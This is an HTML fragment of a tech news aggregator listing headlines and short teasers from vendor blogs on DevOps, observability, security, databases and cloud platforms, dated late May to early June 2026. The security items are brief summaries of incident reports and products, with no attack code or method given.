          📄 Stop managing, start orchestrating: Streamlining catalyst operations with Red Hat Ansible Automation Platform
        </a>
        </h3><p>Modern enterprise networks demand speed, consistency, and absolute resilience. Relying on manual, time-consuming network management tasks is no longer a viable strategy for organizations seeking true </p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/stop-managing-start-orchestrating-streamlining-catalyst-operations-red-hat-ansible-automation-platform"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-connect-customer-now-supports-scheduling-tasks-up-to-90-days-in-advance" class="group relative scroll-mt-24">
        <a href="#h3-amazon-connect-customer-now-supports-scheduling-tasks-up-to-90-days-in-advance" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon Connect Customer now supports scheduling tasks up to 90 days in advance
        </a>
        </h3><p>Amazon Connect Customer now supports scheduling tasks up to 90 days in advance, helping organizations plan, route, and track long-running follow-up work. For example, an insurance team managing an aut</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/amazon-connect-customer-tasks-90day-schedule"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-generating-a-pulumi-provider-from-an-openapi-spec" class="group relative scroll-mt-24">
        <a href="#h3-generating-a-pulumi-provider-from-an-openapi-spec" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Generating a Pulumi Provider from an OpenAPI Spec
        </a>
        </h3><p>Today, we are announcing v1.0 of the Pulumi Service Provider: a major milestone in managing Pulumi Cloud with Pulumi itself. The provider is now generated directly from the Pulumi Cloud OpenAPI specif</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/generating-a-pulumi-provider-from-an-openapi-spec/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-stop-tuning-prompts-build-a-harness" class="group relative scroll-mt-24">
        <a href="#h3-stop-tuning-prompts-build-a-harness" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Stop Tuning Prompts. Build a Harness.
        </a>
        </h3><p>Anthropic shipped a piece earlier this month called How Claude Code Works in Large Codebases. I have not read anything more useful about coding agents this year. The core claim, in their words: “the e</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/stop-tuning-prompts-build-a-harness/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-observability" class="group relative scroll-mt-24">
        <a href="#h2-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📊 Observability
        </a>
        </h2><h3 id="h3-mlops-lifecycle-stages-workflow-and-best-practices" class="group relative scroll-mt-24">
        <a href="#h3-mlops-lifecycle-stages-workflow-and-best-practices" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 MLOps Lifecycle: Stages, Workflow, and Best Practices
        </a>
        </h3><p>Understand the MLOps lifecycle from data preparation to monitoring.</p>
<p><strong>📅 May 30, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/mlops-lifecycle/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-ses-now-offers-inbox-placement-metrics-and-blocklist-monitoring" class="group relative scroll-mt-24">
        <a href="#h3-amazon-ses-now-offers-inbox-placement-metrics-and-blocklist-monitoring" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon SES now offers inbox placement metrics and blocklist monitoring
        </a>
        </h3><p>Today, Amazon Simple Email Service (SES) launched a new set of deliverability features that help customers get more information about their outbound sending deliverability performance and reputation. </p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/amazon-ses-global-deliverability/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-announcing-trento-version-31" class="group relative scroll-mt-24">
        <a href="#h3-announcing-trento-version-31" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Announcing Trento Version 3.1
        </a>
        </h3><p>Trento 3.1 continues the road started with Trento 3.0 around automation and AI capabilities. It also strengthens the application core and brings important observability improvements. Timezone Awarenes</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/announcing-trento-version-3-1/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-feature-flag-tools-compared-10-platforms-for-safer-releases" class="group relative scroll-mt-24">
        <a href="#h3-feature-flag-tools-compared-10-platforms-for-safer-releases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Feature Flag Tools Compared: 10 Platforms for Safer Releases
        </a>
        </h3><p>Compare 10 feature flag tools across rollout controls, experimentation, governance, self-hosting, and observability. Find the best platform for startups, enterprises, and data-driven teams.</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/feature-flag-tools-compared-10-best-platforms-for-safer-releases"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-we-cut-build-times-by-two-thirds-by-deleting-our-cms" class="group relative scroll-mt-24">
        <a href="#h3-how-we-cut-build-times-by-two-thirds-by-deleting-our-cms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How we cut build times by two-thirds by deleting our CMS
        </a>
        </h3><p>Sentry replaced its CMS with Astro, Markdown, and Claude Code skills — cutting build times from 14 to under 4 minutes and eliminating API failures.</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 Sentry Blog</strong></p>
<p><a href="https://blog.sentry.io/cut-build-times-delete-cms/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-you-dont-need-to-pick-one-how-sentry-and-opentelemetry-work-together" class="group relative scroll-mt-24">
        <a href="#h3-you-dont-need-to-pick-one-how-sentry-and-opentelemetry-work-together" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 You don’t need to pick one: how Sentry and OpenTelemetry work together
        </a>
        </h3><p>Use Sentry on the frontend, keep OpenTelemetry on the backend, and choose direct OTLP or Collector forwarding for OTLP events.</p>
<p><strong>📅 May 27, 2026</strong> • <strong>📰 Sentry Blog</strong></p>
<p><a href="https://blog.sentry.io/sentry-opentelemetry-work-together/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-your-agent-cant-fix-what-it-cant-see" class="group relative scroll-mt-24">
        <a href="#h3-your-agent-cant-fix-what-it-cant-see" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Your agent can't fix what it can't see
        </a>
        </h3><p>Agents can&#39;t fix bugs they can&#39;t see. Learn how Sentry MCP and CLI give coding agents the production context to diagnose and fix issues automatically.</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 Sentry Blog</strong></p>
<p><a href="https://blog.sentry.io/agents-need-production-context/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-can-a-high-performance-culture-also-prioritize-wellbeing" class="group relative scroll-mt-24">
        <a href="#h3-can-a-high-performance-culture-also-prioritize-wellbeing" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Can a High-Performance Culture Also Prioritize Wellbeing?
        </a>
        </h3><p>Discover how New Relic balances a high-performance culture with mental health and wellbeing through community, compassion, and continuous support.</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/news/can-a-high-performance-culture-also-prioritize-wellbeing"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-security" class="group relative scroll-mt-24">
        <a href="#h2-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔐 Security
        </a>
        </h2><h3 id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="group relative scroll-mt-24">
        <a href="#h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Threats Making WAVs - Incident Response to a Cryptomining Attack
        </a>
        </h3><p>Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, in</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/threats-making-wavs-incident-reponse-cryptomining-attack"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-claude-code-security-catches-vulnerabilities-while-you-write-code" class="group relative scroll-mt-24">
        <a href="#h3-claude-code-security-catches-vulnerabilities-while-you-write-code" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Claude Code Security Catches Vulnerabilities While You Write Code
        </a>
        </h3><p>Claude Code Security uses AI reasoning to catch complex vulnerabilities in code — including logic flaws that traditional static analysis tools consistently miss.</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/claude-code-security-catches-vulnerabilities-while-you-write-code/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-aws-shield-advanced-introduces-ddos-attack-flow-logs" class="group relative scroll-mt-24">
        <a href="#h3-aws-shield-advanced-introduces-ddos-attack-flow-logs" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AWS Shield Advanced introduces DDoS attack flow logs
        </a>
        </h3><p>AWS Shield Advanced announces distributed denial-of-service (DDoS) attack flow logs, giving you packet-level visibility into traffic hitting Shield Advanced protected resources during a DDoS attack. T</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/aws-shield-ddos/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-petabytes-to-predictions-easy-bigquery-insights-in-google-sheets" class="group relative scroll-mt-24">
        <a href="#h3-from-petabytes-to-predictions-easy-bigquery-insights-in-google-sheets" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From petabytes to predictions: Easy BigQuery insights in Google Sheets
        </a>
        </h3><p>Many organizations’ single source of truth is data that resides in BigQuery, Google’s governed, secure and petabyte-scale data platform. However, the &quot;last mile&quot; of ad-hoc analysis, modeling, and repo</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/data-analytics/using-connected-sheets-to-analyze-bigquery-data/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-relay-network-adopted-ai-coding-securely-and-built-the-foundation-for-agentic-development" class="group relative scroll-mt-24">
        <a href="#h3-how-relay-network-adopted-ai-coding-securely-and-built-the-foundation-for-agentic-development" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How Relay Network Adopted AI Coding Securely and Built the Foundation for Agentic Development
        </a>
        </h3><p>See how Relay Network securely adopted AI coding with Snyk and GitHub Copilot, implementing &quot;secure at inception&quot; to reduce vulnerabilities and accelerate development.</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/relay-network-ai-coding-securely-coagentic-development/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-fix-sca-issues-at-scale-in-your-terminal-with-snyk-remediation-agent-in-the-cli" class="group relative scroll-mt-24">
        <a href="#h3-fix-sca-issues-at-scale-in-your-terminal-with-snyk-remediation-agent-in-the-cli" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Fix SCA issues at scale in your terminal with Snyk Remediation Agent in the CLI
        </a>
        </h3><p>Stop security backlogs. Snyk&#39;s Remediation Agent in the CLI pairs AI reasoning with Snyk security intelligence to fix SCA issues at scale directly in your terminal.</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/snyk-remediation-agent-in-the-cli/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-10-essential-reads-to-optimize-performance-security-and-roi-in-the-ai-era" class="group relative scroll-mt-24">
        <a href="#h3-10-essential-reads-to-optimize-performance-security-and-roi-in-the-ai-era" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 10 essential reads to optimize performance, security, and ROI in the AI era
        </a>
        </h3><p>As enterprise IT organizations push deeper into operationalizing AI, the conversation has shifted from theoretical capability to hard execution metrics. Whether your team is talking with customers abo</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/10-essential-reads-optimize-performance-security-and-roi-ai-era"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-anthropics-mythos-glasswing-and-ais-next-phase" class="group relative scroll-mt-24">
        <a href="#h3-anthropics-mythos-glasswing-and-ais-next-phase" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Anthropic’s Mythos, Glasswing, and AI’s Next Phase
        </a>
        </h3><p>This is not a security problem. As we’ve settled into the speed of AI, it’s become clear that security isn’t a job solely for the security team. Here’s why.</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/anthropics-mythos-glasswing-and-how-the-industry-must-move-forward"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-is-digital-sovereignty-illusory-without-open-source-and-a-trusted-supply-chain" class="group relative scroll-mt-24">
        <a href="#h3-is-digital-sovereignty-illusory-without-open-source-and-a-trusted-supply-chain" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Is digital sovereignty illusory without open source and a trusted supply chain?
        </a>
        </h3><p>For a Chief Information Officer (CIO) or VP of Infrastructure, the term &quot;digital sovereignty&quot; often arrives as a regulatory burden to support a collection of acronyms like DORA (the EU Digital Operati</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/digital-sovereignty-illusory-without-open-source-and-trusted-supply-chain"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-7-features-of-red-hat-identity-management-you-need-to-know-for-the-modern-enterprise" class="group relative scroll-mt-24">
        <a href="#h3-7-features-of-red-hat-identity-management-you-need-to-know-for-the-modern-enterprise" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 7 features of Red Hat Identity Management you need to know for the modern enterprise
        </a>
        </h3><p>In the era of hyper-distributed systems where AI agents traverse our networks, and hybrid clouds stretch from the edge to the core, the &quot;who&quot; and &quot;what&quot; of infrastructure access are more critical than</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/7-features-red-hat-identity-management-you-need-know-modern-enterprise"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-continuous-offensive-security-the-line-weve-been-walking" class="group relative scroll-mt-24">
        <a href="#h3-continuous-offensive-security-the-line-weve-been-walking" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Continuous Offensive Security: The Line We've Been Walking
        </a>
        </h3><p>Snyk&#39;s Continuous Offensive Security unifies DAST, AI pentesting, and agent red teaming to find exploitable flaws — not just bugs — before attackers do. Here&#39;s why lineage matters.</p>
<p><strong>📅 May 27, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/continuous-offensive-security/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-blog-introducing-falco-0440" class="group relative scroll-mt-24">
        <a href="#h3-blog-introducing-falco-0440" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Blog: Introducing Falco 0.44.0
        </a>
        </h3><p>Dear Falco Community, we are happy to announce the release of Falco 0.44.0 today! This release completes the deprecation cycle started in 0.42.0 and 0.43.0: the legacy eBPF probe, the gVisor engine, a</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 Falco Blog</strong></p>
<p><a href="https://falco.org/blog/falco-0-44-0/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-databases" class="group relative scroll-mt-24">
        <a href="#h2-databases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          💾 Databases
        </a>
        </h2><h3 id="h3-please_read_me-the-opportunistic-ransomware-devastating-mysql-servers" class="group relative scroll-mt-24">
        <a href="#h3-please_read_me-the-opportunistic-ransomware-devastating-mysql-servers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 PLEASE_READ_ME: The Opportunistic Ransomware Devastating MySQL Servers
        </a>
        </h3><p>Guardicore Labs uncovers a Ransomware detection campaign targeting MySQL servers. Attackers use Double Extortion and publish data to pressure victims.</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/please-read-me-opportunistic-ransomware-devastating-mysql-servers"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-in-two-may-2026-edition" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-in-two-may-2026-edition" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What’s new in two: May 2026 edition
        </a>
        </h3><p>Welcome back to “What’s new in two,” your quick hit of Redis releases you might’ve missed over the last month. If your backlog has been winning lately, no worries—we’ve got the recap. We’re covering t</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/whats-new-in-two-may-2026-edition/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scylladb-customer-experience-spotlight-tyler-denton" class="group relative scroll-mt-24">
        <a href="#h3-scylladb-customer-experience-spotlight-tyler-denton" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 ScyllaDB Customer Experience Spotlight: Tyler Denton
        </a>
        </h3><p>Welcome to the first installment of a new blog series introducing some of the experts you’re likely to encounter when you work with ScyllaDB. Let&#39;s get to know Tyler Denton, a Solutions Architect on t</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/05/28/scylladb-customer-experience-spotlight-tyler-denton/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-conflict-free-replicated-data-types-power-active-active-database-replication" class="group relative scroll-mt-24">
        <a href="#h3-how-conflict-free-replicated-data-types-power-active-active-database-replication" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How Conflict-free Replicated Data Types power active-active database replication
        </a>
        </h3><p>Your application runs in three regions. A customer in Tokyo buys the last unit of a product at the exact moment a customer in Frankfurt buys the same SKU. Both writes succeed locally. Both replicas de</p>
<p><strong>📅 May 27, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/how-crdts-power-active-active-database-replication/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-best-paas-for-multi-region-deployments-in-2026" class="group relative scroll-mt-24">
        <a href="#h3-the-best-paas-for-multi-region-deployments-in-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Best PaaS for Multi-Region Deployments in 2026
        </a>
        </h3><p>Narrower than the general multi-region listicle. Specifically the PaaS-shaped products that handle deploys, scaling, routing, and database adjacency across regions, with the seven regions Railway runs</p>
<p><strong>📅 May 27, 2026</strong> • <strong>📰 Railway Blog</strong></p>
<p><a href="https://blog.railway.com/p/best-paas-multi-region-deployments-2026"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-beyond-rag-using-yugabytedb-as-the-foundation-for-reliable-ai-decisions" class="group relative scroll-mt-24">
        <a href="#h3-beyond-rag-using-yugabytedb-as-the-foundation-for-reliable-ai-decisions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Beyond RAG: Using YugabyteDB as the Foundation for Reliable AI Decisions
        </a>
        </h3><p>With YugabyteDB at the core, customer records, vector embeddings, policies, and audit logs live together in a single distributed data layer. There is one source of truth and one consistent answer. Thi</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 Yugabyte Blog</strong></p>
<p><a href="https://www.yugabyte.com/blog/using-yugabytedb-for-reliable-ai-decisions/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-context-orchestration-what-it-is-how-it-works" class="group relative scroll-mt-24">
        <a href="#h3-context-orchestration-what-it-is-how-it-works" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Context orchestration: what it is &amp; how it works
        </a>
        </h3><p>Your LLM application works fine in a demo. You ship it to production, and it starts hallucinating on stale data, looping through the same tool calls, and burning through tokens in retry cycles. The mo</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/context-orchestration/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-single-shot-reliable-consumers-with-xreadgroup-claim-in-redis-84" class="group relative scroll-mt-24">
        <a href="#h3-single-shot-reliable-consumers-with-xreadgroup-claim-in-redis-84" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Single-shot reliable consumers with XREADGROUP CLAIM in Redis 8.4
        </a>
        </h3><p>In Redis 8.4, we extended XREADGROUP with a new optional CLAIM parameter that lets a single command both consume new stream entries and reclaim idle pending ones. In this blog post, we&#39;ll cover: Why r</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/single-shot-reliable-consumers-with-xreadgroup-claim-in-redis-84/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-platforms" class="group relative scroll-mt-24">
        <a href="#h2-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🌐 Platforms
        </a>
        </h2><h3 id="h3-the-oracle-of-delphi-will-steal-your-credentials" class="group relative scroll-mt-24">
        <a href="#h3-the-oracle-of-delphi-will-steal-your-credentials" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Oracle of Delphi Will Steal Your Credentials
        </a>
        </h3><p>Our deception technology is able to reroute attackers into honeypots, where they believe that they found their real target. The attacks brute forced passwords for RDP credentials to connect to the vic</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-oracle-of-delphi-steal-your-credentials"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="group relative scroll-mt-24">
        <a href="#h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Nansh0u Campaign – Hackers Arsenal Grows Stronger
        </a>
        </h3><p>In the beginning of April, three attacks detected in the Guardicore Global Sensor Network (GGSN) caught our attention. All three had source IP addresses originating in South Africa and hosted by Volum</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-nansh0u-campaign-hackers-arsenal-grows-stronger"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-diy-platform-trap-thats-burning-out-engineering-teams" class="group relative scroll-mt-24">
        <a href="#h3-the-diy-platform-trap-thats-burning-out-engineering-teams" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The DIY platform trap that’s burning out engineering teams
        </a>
        </h3><p>Platform engineers are some of the most resourceful people in IT. Give them a problem, and they’ll automate their way</p>
<p><strong>📅 May 31, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/diy-platform-burnout-trap/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-disruptors-how-the-next-generation-of-business-is-being-built" class="group relative scroll-mt-24">
        <a href="#h3-ai-disruptors-how-the-next-generation-of-business-is-being-built" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI Disruptors: How the Next Generation of Business is Being Built
        </a>
        </h3><p>Getting your hands on a capable AI model is the easy part now. Every team can reach the same frontier models through an API, so a strong model is not what sets a product apart. What separates a workin</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 DigitalOcean Blog</strong></p>
<p><a href="https://www.digitalocean.com/blog/ai-disruptors"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-aws-end-user-messaging-rcs-for-business-now-available-in-20-additional-countries" class="group relative scroll-mt-24">
        <a href="#h3-aws-end-user-messaging-rcs-for-business-now-available-in-20-additional-countries" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AWS End User Messaging RCS for Business now available in 20 additional countries
        </a>
        </h3><p>AWS End User Messaging now supports RCS for Business messaging in 20 additional countries, bringing the total to 22. Businesses can now send verified, branded RCS messages to customers in Austria, Bra</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/aws-rcs-countries/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-with-google-cloud" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-with-google-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What’s new with Google Cloud
        </a>
        </h3><p>Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. Tip: Not</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-cool-stuff-google-cloud-customers-built-may-edition-agentic-algorithms-for-supply-chains-virtual-try-on-apis-robotic-camera-operators-more" class="group relative scroll-mt-24">
        <a href="#h3-cool-stuff-google-cloud-customers-built-may-edition-agentic-algorithms-for-supply-chains-virtual-try-on-apis-robotic-camera-operators-more" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Cool stuff Google Cloud customers built, May edition: Agentic algorithms for supply chains; virtual try-on APIs; robotic camera operators & more
        </a>
        </h3><p>AI and cloud technology are reshaping every corner of every industry around the world. Without our customers, who are building the future on our platform, there would be no Google Cloud. In this regul</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-developers-guide-to-gemini-enterprise-and-a2ui-integration" class="group relative scroll-mt-24">
        <a href="#h3-developers-guide-to-gemini-enterprise-and-a2ui-integration" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Developer's guide to Gemini Enterprise and A2UI integration
        </a>
        </h3><p>If you&#39;ve built a chatbot, you know this conversation: User: &quot;Book a table for two tomorrow at 7pm.&quot; Agent: &quot;Okay, for what day?&quot; User: &quot;Tomorrow.&quot; Agent: &quot;What time?&quot; A date picker would have ended t</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/developers-practitioners/guide-to-gemini-enterprise-and-a2ui-integration/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-opencode-now-supports-digitalocean-inference-router-for-intelligent-model-routing" class="group relative scroll-mt-24">
        <a href="#h3-opencode-now-supports-digitalocean-inference-router-for-intelligent-model-routing" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 OpenCode Now Supports DigitalOcean Inference Router for Intelligent Model Routing
        </a>
        </h3><p>Coding agents today have a massive spending problem. Every request, whether you’re designing system architecture or writing a single-line docstring, often gets routed to the same expensive frontier mo</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 DigitalOcean Blog</strong></p>
<p><a href="https://www.digitalocean.com/blog/digitalocean-opencode-inference-routers"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-canonical-announces-optimized-ubuntu-images-for-tpu-virtual-machines-by-google-cloud" class="group relative scroll-mt-24">
        <a href="#h3-canonical-announces-optimized-ubuntu-images-for-tpu-virtual-machines-by-google-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Canonical announces optimized Ubuntu images for TPU virtual machines by Google Cloud
        </a>
        </h3><p>Canonical and Google Cloud announced the availability of certified Ubuntu images for Google’s Cloud TPU Virtual Machines.</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/canonical-announces-optimized-ubuntu-images-for-tpu-virtual-machines-by-google-cloud"><strong>🔗 Read more</strong></a></p>
